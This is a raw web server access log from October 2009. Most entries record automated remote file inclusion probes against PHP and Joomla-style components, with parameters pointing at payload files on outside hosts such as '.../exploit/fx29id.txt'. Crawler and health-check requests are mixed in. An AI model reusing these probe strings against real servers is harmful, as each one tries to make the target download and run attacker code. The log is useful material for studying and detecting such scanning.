200.35.150.139 - - [13/Oct/2009:03:36:48 -0400] "GET /convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:36:50 -0400] "GET /logs/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:36:51 -0400] "GET /logs/access_log.Q109081800%20%20/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:36:54 -0400] "GET /logs/access_log.Q109082100%20%20/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:37:12 -0400] "GET /logs/access_log.Q109092600/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:37:12 -0400] "GET /contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:37:12 -0400] "GET /logs/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:37:33 -0400] "GET /convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:37:33 -0400] "GET /logs/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:37:33 -0400] "GET /logs/access_log.Q109081800/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:37:34 -0400] "GET /contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:37:34 -0400] "GET /logs/access_log.Q109092600/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:37:34 -0400] "GET /logs/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:37:35 -0400] "GET /logs/error_log.Q109061100/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:37:35 -0400] "GET /convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:37:37 -0400] "GET /logs/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:03:37:38 -0400] "GET /logs/access_log.Q109081800/convert/mvcw.php?vwar_root=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:37:39 -0400] "GET /logs/access_log.Q109082800/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:38:03 -0400] "GET /logs/access_log.Q109082800/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:38:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.199.232.195 - - [13/Oct/2009:03:40:12 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
203.185.129.36 - - [13/Oct/2009:03:40:48 -0400] "GET /index.php?pag=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:40:48 -0400] "GET /logs/index.php?pag=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Oct/2009:03:41:10 -0400] "GET /logs/access_log.Q109051200%20%20/skin/zero_vote/ask_password.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Oct/2009:03:41:16 -0400] "GET /logs/access_log.Q109081600%20%20/skin/zero_vote/ask_password.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:41:20 -0400] "GET /index.php?pag=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:41:20 -0400] "GET /logs/index.php?pag=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:43:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.4.113.98 - - [13/Oct/2009:03:44:00 -0400] "GET /logs/access_log.Q109052500/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:44:15 -0400] "GET /logs/access_log.Q109052300/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.30.78.234 - - [13/Oct/2009:03:44:18 -0400] "GET /logs/error_log.Q108111500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.185.129.36 - - [13/Oct/2009:03:44:30 -0400] "GET /logs/access_log.Q109070500%20%20/index.php?pag=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:44:46 -0400] "GET /logs/access_log.Q109070500%20%20/index.php?pag=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:03:45:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
174.143.3.188 - - [13/Oct/2009:03:45:42 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
174.143.3.188 - - [13/Oct/2009:03:45:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
174.143.3.188 - - [13/Oct/2009:03:45:42 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
72.11.145.8 - - [13/Oct/2009:03:45:43 -0400] "GET /logs/access_log.Q109071700//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:03:45:45 -0400] "GET /logs/access_log.Q109081500//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:48:06 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:48:06 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:48:12 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:48:12 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:48:16 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:48:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.135.218.37 - - [13/Oct/2009:03:48:36 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:03:48:55 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
65.55.106.132 - - [13/Oct/2009:03:49:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.135.218.37 - - [13/Oct/2009:03:50:00 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:50:00 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:50:00 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:53:02 -0400] "GET //?path%5Bdocroot%5D=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:53:02 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:03:53:02 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:53:11 -0400] "GET /logs/access_log.Q109052500/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:53:13 -0400] "GET /?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:53:13 -0400] "GET /logs/?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:53:14 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:53:28 -0400] "GET /logs/access_log.Q109052300/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:53:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.135.218.37 - - [13/Oct/2009:03:53:43 -0400] "GET /logs/access_log.Q109071400%20%20//?path%5Bdocroot%5D=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:03:55:30 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [13/Oct/2009:03:55:30 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
174.143.3.188 - - [13/Oct/2009:03:55:30 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
174.143.3.188 - - [13/Oct/2009:03:55:30 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
203.229.58.122 - - [13/Oct/2009:03:55:33 -0400] "GET /?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:55:33 -0400] "GET /logs/?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:55:34 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:03:55:47 -0400] "GET //modules/errors.php?error=http://djgono.nl/gallery/albums/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:03:55:53 -0400] "GET /logs//modules/errors.php?error=http://djgono.nl/gallery/albums/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:03:55:53 -0400] "GET /logs/access_log.Q109080200%20%20//modules/errors.php?error=http://djgono.nl/gallery/albums/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:56:28 -0400] "GET /logs//common/db.php?commonpath=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:56:28 -0400] "GET //common/db.php?commonpath=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:56:29 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:03:57:49 -0400] "GET /?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:57:56 -0400] "GET //common/db.php?commonpath=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:57:56 -0400] "GET /logs//common/db.php?commonpath=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:57:56 -0400] "GET /logs/access_log.Q109071100%20%20//common/db.php?commonpath=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:03:57:57 -0400] "GET /logs/?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Oct/2009:03:58:02 -0400] "GET /logs/access_log.Q109051500/skin/zero_vote/ask_password.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:03:58:02 -0400] "GET /logs/access_log.Q109071700//components/com_flyspray/startdown.php?file=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
124.0.54.130 - - [13/Oct/2009:03:58:04 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.79.165.19 - - [13/Oct/2009:03:58:19 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=http://taguig.ca/file/id? HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
66.79.165.19 - - [13/Oct/2009:03:58:19 -0400] "GET /?custompluginfile[]=http://taguig.ca/file/id? HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
66.79.165.19 - - [13/Oct/2009:03:58:19 -0400] "GET /logs/?custompluginfile[]=http://taguig.ca/file/id? HTTP/1.1" 200 21652 "-" "libwww-perl/5.831"
209.59.12.99 - - [13/Oct/2009:03:58:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.229.58.122 - - [13/Oct/2009:03:59:12 -0400] "GET /?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:59:13 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:59:12 -0400] "GET /logs/?sourcedir=http://honamit.com/.../id1.txt??? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Oct/2009:03:59:56 -0400] "GET /logs/admin_modules/admin_module_deldir.inc.php?co%20nfig[path_src_include]=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Oct/2009:03:59:56 -0400] "GET /logs/access_log.Q109092900/admin_modules/admin_module_deldir.inc.php?co%20nfig[path_src_include]=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Oct/2009:03:59:56 -0400] "GET /admin_modules/admin_module_deldir.inc.php?co%20nfig[path_src_include]=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.30.81.166 - - [13/Oct/2009:04:00:46 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.166 - - [13/Oct/2009:04:00:46 -0400] "GET /logs/error_log.Q109100100 HTTP/1.0" 200 2897063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.166 - - [13/Oct/2009:04:00:47 -0400] "GET /logs/error_log.Q109100100 HTTP/1.0" 200 2897063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.193.55 - - [13/Oct/2009:04:01:48 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
211.172.225.50 - - [13/Oct/2009:04:01:50 -0400] "GET /home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:01:50 -0400] "GET /logs/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:01:50 -0400] "GET /logs/access_log.Q109053100/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:01:51 -0400] "GET /logs/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:01:51 -0400] "GET /home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:01:51 -0400] "GET /logs/access_log.Q109053100/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:01:57 -0400] "GET /logs/access_log.Q109081500/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:01:57 -0400] "GET /logs/access_log.Q109081500/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:03:36 -0400] "GET /logs/access_log.Q109053100%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:03:37 -0400] "GET /logs/access_log.Q109053100%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:03:37 -0400] "GET /logs/access_log.Q109081500%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:04:03:50 -0400] "GET /logs/access_log.Q109081500%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:03:50 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:03:50 -0400] "GET /logs/?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:03:54 -0400] "GET /home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:03:55 -0400] "GET /logs/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:03:56 -0400] "GET /logs/access_log.Q109053100%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:03:58 -0400] "GET /?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:04:04:11 -0400] "GET /logs/access_log.Q109071400//?path%5Bdocroot%5D=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Oct/2009:04:04:13 -0400] "GET /logs/access_log.Q109092900%20%20/admin_modules/admin_module_deldir.inc.php?co%20nfig[path_src_include]=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:04:15 -0400] "GET /logs/access_log.Q109081500%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:04:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.199.232.195 - - [13/Oct/2009:04:04:32 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
211.40.68.132 - - [13/Oct/2009:04:05:14 -0400] "GET /logs/access_log.Q109053100/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:05:23 -0400] "GET /logs/access_log.Q109081500/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:06:10 -0400] "GET /home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:06:11 -0400] "GET /logs/access_log.Q109053100%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:06:12 -0400] "GET /logs/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:06:16 -0400] "GET /logs/access_log.Q109081500%20%20/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:06:55 -0400] "GET /?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:06:56 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:07:03 -0400] "GET /logs/?sourcedir=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:07:12 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:07:13 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:07:13 -0400] "GET /logs/access_log.Q109071300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:07:15 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:07:15 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
